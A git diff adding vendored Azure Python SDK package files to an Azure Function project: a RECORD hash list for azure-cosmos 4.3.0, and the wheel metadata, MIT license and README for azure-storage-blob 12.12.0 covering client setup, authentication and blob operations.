+azure/cosmos/_retry_options.py,sha256=fPvjqk4Ubt9aOIeXf0fXJ9i54YRcQTbsN08mui8UCpE,2430 +azure/cosmos/_retry_utility.py,sha256=PSIDIdlIEx8YaXeZZ8YMJvmMTHu-wwHmHQlw7GwVtz8,10139 +azure/cosmos/_routing/__init__.py,sha256=cz3FOUlbIIsSPAndnNdAwxvJ7YqW04N_NY5jjZdDOsY,1121 +azure/cosmos/_routing/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/_routing/__pycache__/collection_routing_map.cpython-39.pyc,, +azure/cosmos/_routing/__pycache__/routing_map_provider.cpython-39.pyc,, +azure/cosmos/_routing/__pycache__/routing_range.cpython-39.pyc,, +azure/cosmos/_routing/aio/__init__.py,sha256=tvxon2u0FtnFLeIOSqCr9klTHhXvSLp1TsmZ4RhwOk0,1121 +azure/cosmos/_routing/aio/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/_routing/aio/__pycache__/routing_map_provider.cpython-39.pyc,, +azure/cosmos/_routing/aio/routing_map_provider.py,sha256=-Xb4KFlXsscgCguodE1Zkr2jkj7bwRzbqBcDN390I2s,8085 +azure/cosmos/_routing/collection_routing_map.py,sha256=QzfZMO6ZaGOHIJrpHB4AFaaVlM5AiD1gt9me3k6MiMk,7562 +azure/cosmos/_routing/routing_map_provider.py,sha256=NaeqUtyMHqi4f2angvtJKsL7XCnfHmXOxYZ3AKRB8xQ,7963 +azure/cosmos/_routing/routing_range.py,sha256=Tj2GG8IHVZKcV0BqOj6dqDYiFFdDFh6HbX8iz1luXeI,4520 +azure/cosmos/_runtime_constants.py,sha256=GACtBV4yE8hAvKbGpup2dUJZzWdFBvC-FSGR9Ty-AOc,1696 +azure/cosmos/_session.py,sha256=mXXD3-hooXVC4uePZ2skVguDV5wSn4xg_6L9vHvJjAc,9656 +azure/cosmos/_session_retry_policy.py,sha256=Mi44vcKlqztifnI4Mk-kgvGGQgQvcOYp5GTiOZu6_yY,5771 +azure/cosmos/_synchronized_request.py,sha256=ko5ktjf-xaM2f6ZN3HxDdX47wqxt8kggTU--Q-InSg8,7918 +azure/cosmos/_utils.py,sha256=MnaZghbLPxmjSSdF2l1Qno7UqPIuNvssr00M8ijRG9Y,1990 +azure/cosmos/_vector_session_token.py,sha256=rI-XfDBhl5aiDh-58qQ7AL4vohayKM6chylK65ttbeY,6575 +azure/cosmos/_version.py,sha256=SkGEnyCt54yV6To5kn44J1TKBqPs2XdPZMZJx46nWzk,1140 +azure/cosmos/aio/__init__.py,sha256=fZhNrJ452z0eONWBYDbMil0E35B4izXslqpoPEAoOgo,1417 +azure/cosmos/aio/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_asynchronous_request.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_auth_policy_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_container.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_cosmos_client.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_cosmos_client_connection_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_database.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_global_endpoint_manager_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_query_iterable_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_retry_utility_async.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_scripts.cpython-39.pyc,, +azure/cosmos/aio/__pycache__/_user.cpython-39.pyc,, +azure/cosmos/aio/_asynchronous_request.py,sha256=GkWPjLXZAH3wbFoINY2rFG4fNB3SO807hI0TQrqSdg0,7239 +azure/cosmos/aio/_auth_policy_async.py,sha256=w2ox2tTa3MDf_rRtwy1nQWRMXN2BVWktjB_FttJhrNQ,8185 +azure/cosmos/aio/_container.py,sha256=RJ8JR6i8ukQkYBCo4I6AesTBWWtvdVggTl6ZZzfZy_k,39551 +azure/cosmos/aio/_cosmos_client.py,sha256=p4ZBz_Yp4vwmrtl1fvn_pMslJPLHW-qoPYNIuMIQy7k,18681 +azure/cosmos/aio/_cosmos_client_connection_async.py,sha256=gF8tAAXQQaWIq3TvJEjaFRg7R12MvRZlH1g7Z__N-S0,92059 +azure/cosmos/aio/_database.py,sha256=H0cRZpXQkT7UJ6XcZ-dImenEoJ0KvKJ9P3kr5ZctPH8,38861 +azure/cosmos/aio/_global_endpoint_manager_async.py,sha256=oJD6iMicJvSD2HpAD9ESt1HzZIoaHfu3xXm9_Qcielo,7768 +azure/cosmos/aio/_query_iterable_async.py,sha256=6wJqFSheS0qwhv05kJWIu5mKcQus8013sJV-Dp2hXIw,4215 +azure/cosmos/aio/_retry_utility_async.py,sha256=5RRSX24oEbQv3YDNww6bd-IV-3QyjlefQscwRc0mfOg,9575 +azure/cosmos/aio/_scripts.py,sha256=tAvRa92SuZ0UPuhKD-bcyAz1Ifg_YTwSQMa6H3_pi6U,22102 +azure/cosmos/aio/_user.py,sha256=sTGKunNHXKMZ6jTse7G9ac9FAseWjjhK4P7jM4or4qY,14320 +azure/cosmos/auth.py,sha256=V4iZ8JSbRZkDkFjsCIu79r0xvpmvbk-GWU_jyu6MN_0,6007 +azure/cosmos/container.py,sha256=Q2eKHJoqlu8jUuAhPZccmc8AHMyUzQP-qrUicylYLqI,40882 +azure/cosmos/cosmos_client.py,sha256=TJjsXNK_tB8YYzvL-MSZrf6uac39mNhLfG7-oPdGmeU,23589 +azure/cosmos/database.py,sha256=XyoSpVetlkz5Hf-NSktgtzsEjfssSTROH-XmsTbb9Io,39017 +azure/cosmos/diagnostics.py,sha256=YZWZJCPqUJ0IhowbBfWfe1ZwvM04K0tfVwXl_4lO0uE,2720 +azure/cosmos/documents.py,sha256=5FA38GKfvFP7nep7BHwXntweH4mk2EjYJEL7S-G0QYs,15256 +azure/cosmos/errors.py,sha256=VlU7QVu5pS07gtEANnbhqjm4AbeRuC1nM_uft3gmFtA,1509 +azure/cosmos/exceptions.py,sha256=MWQjFRVvK-K3bXNLbPOpGooKpTEGskdyJt7EbKCjmPw,3427 +azure/cosmos/http_constants.py,sha256=y72FsJM-X39Fd_GX4mKdiQZYcZgFPB6lLeoe4UU2blE,13567 +azure/cosmos/offer.py,sha256=dZJKD8HgCjZegP4A7QMXRoh0LlVyPsccSd6GnbAXHjk,1719 +azure/cosmos/partition_key.py,sha256=kwHYVENGKdQ8-Ue7ThSu3RXl8Ea0R6wwR7IflAddP-M,2861 +azure/cosmos/permission.py,sha256=BdfOhL5oEk56Ho55EO0DNzyECB0TZEQBGyLwubw1Xe0,1848 +azure/cosmos/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure/cosmos/scripts.py,sha256=xF4Mqk1a2raQFjuBvIF6VJPuI_kmw0lC1KiRcUKAvSk,19608 +azure/cosmos/user.py,sha256=OaCHVdEGX9zFOustJwuWQ3JI9UQghTCOydlA3igdKeE,12762 +azure_cosmos-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +azure_cosmos-4.3.0.dist-info/LICENSE,sha256=_VMkgdgo4ToLE8y1mOAjOKNhd0BnWoYu5r3BVBto6T0,1073 +azure_cosmos-4.3.0.dist-info/METADATA,sha256=F4LnYWM8LR_plg0wUQKXtYRYi5uIJQSjeigCG3BN-a0,47758 +azure_cosmos-4.3.0.dist-info/RECORD,, +azure_cosmos-4.3.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure_cosmos-4.3.0.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +azure_cosmos-4.3.0.dist-info/top_level.txt,sha256=S7DhWV9m80TBzAhOFjxDUiNbKszzoThbnrSz5MpbHSQ,6 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/REQUESTED b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/REQUESTED new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/top_level.txt new file mode 100644 index 0000000..f6434ca --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/top_level.txt @@ -0,0 +1 @@ +azure diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/LICENSE new file mode 100644 index 0000000..4437826 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/LICENSE @@ -0,0 +1,21 @@ +Copyright (c) Microsoft Corporation. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/METADATA new file mode 100644 index 0000000..e09846f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/METADATA @@ -0,0 +1,487 @@ +Metadata-Version: 2.1 +Name: azure-storage-blob +Version: 12.12.0 +Summary: Microsoft Azure Blob Storage Client Library for Python +Home-page: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob +Author: Microsoft Corporation +Author-email: ascl@microsoft.com +License: MIT License +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: License :: OSI Approved :: MIT License +Requires-Python: >=3.6 +Description-Content-Type: text/markdown +Requires-Dist: azure-core (<2.0.0,>=1.23.1) +Requires-Dist: msrest (>=0.6.21) +Requires-Dist: cryptography (>=2.1.4) + +# Azure Storage Blobs client library for Python +Azure Blob storage is Microsoft's object storage solution for the cloud. Blob storage is optimized for storing massive amounts of unstructured data, such as text or binary data. + +Blob storage is ideal for: + +* Serving images or documents directly to a browser +* Storing files for distributed access +* Streaming video and audio +* Storing data for backup and restore, disaster recovery, and archiving +* Storing data for analysis by an on-premises or Azure-hosted service + +[Source code](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/azure/storage/blob) | [Package (PyPI)](https://pypi.org/project/azure-storage-blob/) | [API reference documentation](https://aka.ms/azsdk-python-storage-blob-ref) | [Product documentation](https://docs.microsoft.com/azure/storage/) | [Samples](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples) + + +## Getting started + +### Prerequisites +* Python 3.6 or later is required to use this package. +* You must have an [Azure subscription](https://azure.microsoft.com/free/) and an +[Azure storage account](https://docs.microsoft.com/azure/storage/common/storage-account-overview) to use this package. + +### Install the package +Install the Azure Storage Blobs client library for Python with [pip](https://pypi.org/project/pip/): + +```bash +pip install azure-storage-blob +``` + +### Create a storage account +If you wish to create a new storage account, you can use the +[Azure Portal](https://docs.microsoft.com/azure/storage/common/storage-quickstart-create-account?tabs=azure-portal), +[Azure PowerShell](https://docs.microsoft.com/azure/storage/common/storage-quickstart-create-account?tabs=azure-powershell), +or [Azure CLI](https://docs.microsoft.com/azure/storage/common/storage-quickstart-create-account?tabs=azure-cli): + +```bash +# Create a new resource group to hold the storage account - +# if using an existing resource group, skip this step +az group create --name my-resource-group --location westus2 + +# Create the storage account +az storage account create -n my-storage-account-name -g my-resource-group +``` + +### Create the client +The Azure Storage Blobs client library for Python allows you to interact with three types of resources: the storage +account itself, blob storage containers, and blobs. Interaction with these resources starts with an instance of a +[client](#clients). To create a client object, you will need the storage account's blob service account URL and a +credential that allows you to access the storage account: + +```python +from azure.storage.blob import BlobServiceClient + +service = BlobServiceClient(account_url="https://.blob.core.windows.net/", credential=credential) +``` + +#### Looking up the account URL +You can find the storage account's blob service URL using the +[Azure Portal](https://docs.microsoft.com/azure/storage/common/storage-account-overview#storage-account-endpoints), +[Azure PowerShell](https://docs.microsoft.com/powershell/module/az.storage/get-azstorageaccount), +or [Azure CLI](https://docs.microsoft.com/cli/azure/storage/account?view=azure-cli-latest#az-storage-account-show): + +```bash +# Get the blob service account url for the storage account +az storage account show -n my-storage-account-name -g my-resource-group --query "primaryEndpoints.blob" +``` + +#### Types of credentials +The `credential` parameter may be provided in a number of different forms, depending on the type of +[authorization](https://docs.microsoft.com/azure/storage/common/storage-auth) you wish to use: +1. To use an [Azure Active Directory (AAD) token credential](https://docs.microsoft.com/azure/storage/common/storage-auth-aad), + provide an instance of the desired credential type obtained from the + [azure-identity](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/identity/azure-identity#credentials) library. + For example, [DefaultAzureCredential](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/identity/azure-identity#defaultazurecredential) + can be used to authenticate the client. + + This requires some initial setup: + * [Install azure-identity](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/identity/azure-identity#install-the-package) + * [Register a new AAD application](https://docs.microsoft.com/azure/active-directory/develop/quickstart-register-app) and give permissions to access Azure Storage + * [Grant access](https://docs.microsoft.com/azure/storage/common/storage-auth-aad-rbac-portal) to Azure Blob data with RBAC in the Azure Portal + * Set the values of the client ID, tenant ID, and client secret of the AAD application as environment variables: + AZURE_TENANT_ID, AZURE_CLIENT_ID, AZURE_CLIENT_SECRET + + Use the returned token credential to authenticate the client: + ```python + from azure.identity import DefaultAzureCredential + from azure.storage.blob import BlobServiceClient + token_credential = DefaultAzureCredential() + + blob_service_client = BlobServiceClient( + account_url="https://.blob.core.windows.net", + credential=token_credential + ) + ``` + +2. To use a [shared access signature (SAS) token](https://docs.microsoft.com/azure/storage/common/storage-sas-overview), + provide the token as a string. If your account URL includes the SAS token, omit the credential parameter. + You can generate a SAS token from the Azure Portal under "Shared access signature" or use one of the `generate_sas()` + functions to create a sas token for the storage account, container, or blob: + + ```python + from datetime import datetime, timedelta + from azure.storage.blob import BlobServiceClient, generate_account_sas, ResourceTypes, AccountSasPermissions + + sas_token = generate_account_sas( + account_name="", + account_key="", + resource_types=ResourceTypes(service=True), + permission=AccountSasPermissions(read=True), + expiry=datetime.utcnow() + timedelta(hours=1) + ) + + blob_service_client = BlobServiceClient(account_url="https://.blob.core.windows.net", credential=sas_token) + ``` + +3. To use a storage account [shared key](https://docs.microsoft.com/rest/api/storageservices/authenticate-with-shared-key/) + (aka account key or access key), provide the key as a string. This can be found in the Azure Portal under the "Access Keys" + section or by running the following Azure CLI command: + + ```az storage account keys list -g MyResourceGroup -n MyStorageAccount``` + + Use the key as the credential parameter to authenticate the client: + ```python + from azure.storage.blob import BlobServiceClient + service = BlobServiceClient(account_url="https://.blob.core.windows.net", credential="") + ``` + + If you are using **customized url** (which means the url is not in this format `.blob.core.windows.net`), + please instantiate the client using the credential below: + ```python + from azure.storage.blob import BlobServiceClient + service = BlobServiceClient(account_url="https://.blob.core.windows.net", + credential={"account_name": "", "account_key":""}) + ``` + +4. To use [anonymous public read access](https://docs.microsoft.com/azure/storage/blobs/storage-manage-access-to-resources), + simply omit the credential parameter. + +#### Creating the client from a connection string +Depending on your use case and authorization method, you may prefer to initialize a client instance with a storage +connection string instead of providing the account URL and credential separately. To do this, pass the storage +connection string to the client's `from_connection_string` class method: + +```python +from azure.storage.blob import BlobServiceClient + +connection_string = "DefaultEndpointsProtocol=https;AccountName=xxxx;AccountKey=xxxx;EndpointSuffix=core.windows.net" +service = BlobServiceClient.from_connection_string(conn_str=connection_string) +``` + +The connection string to your storage account can be found in the Azure Portal under the "Access Keys" section or by running the following CLI command: + +```bash +az storage account show-connection-string -g MyResourceGroup -n MyStorageAccount +``` + +## Key concepts +The following components make up the Azure Blob Service: +* The storage account itself +* A container within the storage account +* A blob within a container + +The Azure Storage Blobs client library for Python allows you to interact with each of these components through the +use of a dedicated client object. + +### Clients +Four different clients are provided to interact with the various components of the Blob Service: +1. [BlobServiceClient](https://aka.ms/azsdk-python-storage-blob-blobserviceclient) - + this client represents interaction with the Azure storage account itself, and allows you to acquire preconfigured + client instances to access the containers and blobs within. It provides operations to retrieve and configure the + account properties as well as list, create, and delete containers within the account. To perform operations on a + specific container or blob, retrieve a client using the `get_container_client` or `get_blob_client` methods. +2. [ContainerClient](https://aka.ms/azsdk-python-storage-blob-containerclient) - + this client represents interaction with a specific container (which need not exist yet), and allows you to acquire + preconfigured client instances to access the blobs within. It provides operations to create, delete, or configure a + container and includes operations to list, upload, and delete the blobs within it. To perform operations on a + specific blob within the container, retrieve a client using the `get_blob_client` method. +3. [BlobClient](https://aka.ms/azsdk-python-storage-blob-blobclient) - + this client represents interaction with a specific blob (which need not exist yet). It provides operations to + upload, download, delete, and create snapshots of a blob, as well as specific operations per blob type. +4. [BlobLeaseClient](https://aka.ms/azsdk-python-storage-blob-blobleaseclient) - + this client represents lease interactions with a `ContainerClient` or `BlobClient`. It provides operations to + acquire, renew, release, change, and break a lease on a specified resource. + +### Async Clients +This library includes a complete async API supported on Python 3.5+. To use it, you must +first install an async transport, such as [aiohttp](https://pypi.org/project/aiohttp/). +See +[azure-core documentation](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/CLIENT_LIBRARY_DEVELOPER.md#transport) +for more information. + +Async clients and credentials should be closed when they're no longer needed. These +objects are async context managers and define async `close` methods. + +### Blob Types +Once you've initialized a Client, you can choose from the different types of blobs: +* [Block blobs](https://docs.microsoft.com/rest/api/storageservices/understanding-block-blobs--append-blobs--and-page-blobs#about-block-blobs) + store text and binary data, up to approximately 4.75 TiB. Block blobs are made up of blocks of data that can be + managed individually +* [Append blobs](https://docs.microsoft.com/rest/api/storageservices/understanding-block-blobs--append-blobs--and-page-blobs#about-append-blobs) + are made up of blocks like block blobs, but are optimized for append operations. Append blobs are ideal for scenarios + such as logging data from virtual machines +* [Page blobs](https://docs.microsoft.com/rest/api/storageservices/understanding-block-blobs--append-blobs--and-page-blobs#about-page-blobs) + store random access files up to 8 TiB in size. Page blobs store virtual hard drive (VHD) files and serve as disks for + Azure virtual machines + +## Examples +The following sections provide several code snippets covering some of the most common Storage Blob tasks, including: + +* [Create a container](#create-a-container "Create a container") +* [Uploading a blob](#uploading-a-blob "Uploading a blob") +* [Downloading a blob](#downloading-a-blob "Downloading a blob") +* [Enumerating blobs](#enumerating-blobs "Enumerating blobs") + +Note that a container must be created before to upload or download a blob. + +### Create a container + +Create a container from where you can upload or download blobs. +```python +from azure.storage.blob import ContainerClient + +container_client = ContainerClient.from_connection_string(conn_str="", container_name="my_container") + +container_client.create_container() +``` + +Use the async client to upload a blob + +```python +from azure.storage.blob.aio import ContainerClient + +container_client = ContainerClient.from_connection_string(conn_str="", container_name="my_container") + +await container_client.create_container() +``` + +### Uploading a blob +Upload a blob to your container + +```python +from azure.storage.blob import BlobClient + +blob = BlobClient.from_connection_string(conn_str="", container_name="my_container", blob_name="my_blob") + +with open("./SampleSource.txt", "rb") as data: + blob.upload_blob(data) +``` + +Use the async client to upload a blob + +```python +from azure.storage.blob.aio import BlobClient + +blob = BlobClient.from_connection_string(conn_str="", container_name="my_container", blob_name="my_blob") + +with open("./SampleSource.txt", "rb") as data: + await blob.upload_blob(data) +``` + +### Downloading a blob +Download a blob from your container + +```python +from azure.storage.blob import BlobClient + +blob = BlobClient.from_connection_string(conn_str="my_connection_string", container_name="my_container", blob_name="my_blob") + +with open("./BlockDestination.txt", "wb") as my_blob: + blob_data = blob.download_blob() + blob_data.readinto(my_blob) +``` + +Download a blob asynchronously + +```python +from azure.storage.blob.aio import BlobClient + +blob = BlobClient.from_connection_string(conn_str="my_connection_string", container_name="my_container", blob_name="my_blob") + +with open("./BlockDestination.txt", "wb") as my_blob: + stream = await blob.download_blob() + data = await stream.readall() + my_blob.write(data) +``` + +### Enumerating blobs +List the blobs in your container + +```python +from azure.storage.blob import ContainerClient + +container = ContainerClient.from_connection_string(conn_str="my_connection_string", container_name="my_container") + +blob_list = container.list_blobs() +for blob in blob_list: + print(blob.name + '\n') +``` + +List the blobs asynchronously + +```python +from azure.storage.blob.aio import ContainerClient + +container = ContainerClient.from_connection_string(conn_str="my_connection_string", container_name="my_container") + +blob_list = [] +async for blob in container.list_blobs(): + blob_list.append(blob) +print(blob_list) +``` + +## Optional Configuration + +Optional keyword arguments that can be passed in at the client and per-operation level. + +### Retry Policy configuration + +Use the following keyword arguments when instantiating a client to configure the retry policy: + +* __retry_total__ (int): Total number of retries to allow. Takes precedence over other counts. +Pass in `retry_total=0` if you do not want to retry on requests. Defaults to 10. +* __retry_connect__ (int): How many connection-related errors to retry on. Defaults to 3. +* __retry_read__ (int): How many times to retry on read errors. Defaults to 3. +* __retry_status__ (int): How many times to retry on bad status codes. Defaults to 3. +* __retry_to_secondary__ (bool): Whether the request should be retried to secondary, if able. +This should only be enabled of RA-GRS accounts are used and potentially stale data can be handled. +Defaults to `False`. + +### Encryption configuration + +Use the following keyword arguments when instantiating a client to configure encryption: + +* __require_encryption__ (bool): If set to True, will enforce that objects are encrypted and decrypt them. +* __key_encryption_key__ (object): The user-provided key-encryption-key. The instance must implement the following methods: + - `wrap_key(key)`--wraps the specified key using an algorithm of the user's choice. + - `get_key_wrap_algorithm()`--returns the algorithm used to wrap the specified symmetric key. + - `get_kid()`--returns a string key id for this key-encryption-key. +* __key_resolver_function__ (callable): The user-provided key resolver. Uses the kid string to return a key-encryption-key +implementing the interface defined above. + +### Other client / per-operation configuration + +Other optional configuration keyword arguments that can be specified on the client or per-operation. + +**Client keyword arguments:** + +* __connection_timeout__ (int): The number of seconds the client will wait to establish a connection to the server. +* __read_timeout__ (int): The number of seconds the client will wait, after the connections has been established, for the server to send a response. +* __transport__ (Any): User-provided transport to send the HTTP request. + +**Per-operation keyword arguments:** + +* __raw_response_hook__ (callable): The given callback uses the response returned from the service. +* __raw_request_hook__ (callable): The given callback uses the request before being sent to service. +* __client_request_id__ (str): Optional user specified identification of the request. +* __user_agent__ (str): Appends the custom value to the user-agent header to be sent with the request. +* __logging_enable__ (bool): Enables logging at the DEBUG level. Defaults to False. Can also be passed in at +the client level to enable it for all requests. +* __logging_body__ (bool): Enables logging the request and response body. Defaults to False. Can also be passed in at +the client level to enable it for all requests. +* __headers__ (dict): Pass in custom headers as key, value pairs. E.g. `headers={'CustomValue': value}` + +## Troubleshooting +### General +Storage Blob clients raise exceptions defined in [Azure Core](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/README.md). + +This list can be used for reference to catch thrown exceptions. To get the specific error code of the exception, use the `error_code` attribute, i.e, `exception.error_code`. + +### Logging +This library uses the standard +[logging](https://docs.python.org/3/library/logging.html) library for logging. +Basic information about HTTP sessions (URLs, headers, etc.) is logged at INFO +level. + +Detailed DEBUG level logging, including request/response bodies and unredacted +headers, can be enabled on a client with the `logging_enable` argument: +```python +import sys +import logging +from azure.storage.blob import BlobServiceClient + +# Create a logger for the 'azure.storage.blob' SDK +logger = logging.getLogger('azure.storage.blob') +logger.setLevel(logging.DEBUG) + +# Configure a console output +handler = logging.StreamHandler(stream=sys.stdout) +logger.addHandler(handler) + +# This client will log detailed information about its HTTP sessions, at DEBUG level +service_client = BlobServiceClient.from_connection_string("your_connection_string", logging_enable=True) +``` + +Similarly, `logging_enable` can enable detailed logging for a single operation, +even when it isn't enabled for the client: +```py +service_client.get_service_stats(logging_enable=True) +``` + +## Next steps + +### More sample code + +Get started with our [Blob samples](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples). + +Several Storage Blobs Python SDK samples are available to you in the SDK's GitHub repository. These samples provide example code for additional scenarios commonly encountered while working with Storage Blobs: + +* [blob_samples_container_access_policy.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_container_access_policy.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_container_access_policy_async.py)) - Examples to set Access policies: + * Set up Access Policy for container + +* [blob_samples_hello_world.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_hello_world.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_hello_world_async.py)) - Examples for common Storage Blob tasks: + * Set up a container + * Create a block, page, or append blob + * Upload blobs + * Download blobs + * Delete blobs + +* [blob_samples_authentication.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_authentication.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_authentication_async.py)) - Examples for authenticating and creating the client: + * From a connection string + * From a shared access key + * From a shared access signature token + * From active directory + +* [blob_samples_service.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_service.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_service_async.py)) - Examples for interacting with the blob service: + * Get account information + * Get and set service properties + * Get service statistics + * Create, list, and delete containers + * Get the Blob or Container client + +* [blob_samples_containers.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_containers.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_containers_async.py)) - Examples for interacting with containers: + * Create a container and delete containers + * Set metadata on containers + * Get container properties + * Acquire a lease on container + * Set an access policy on a container + * Upload, list, delete blobs in container + * Get the blob client to interact with a specific blob + +* [blob_samples_common.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_common.py) ([async version](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_common_async.py)) - Examples common to all types of blobs: + * Create a snapshot + * Delete a blob snapshot + * Soft delete a blob + * Undelete a blob + * Acquire a lease on a blob + * Copy a blob from a URL + +* [blob_samples_directory_interface.py](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/storage/azure-storage-blob/samples/blob_samples_directory_interface.py) - Examples for interfacing with Blob storage as if it were a directory on a filesystem: + * Copy (upload or download) a single file or directory + * List files or directories at a single level or recursively + * Delete a single file or recursively delete a directory + +### Additional documentation +For more extensive documentation on Azure Blob storage, see the [Azure Blob storage documentation](https://docs.microsoft.com/azure/storage/blobs/) on docs.microsoft.com. + +## Contributing +This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.microsoft.com. + +When you submit a pull request, a CLA-bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA. + +This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/RECORD 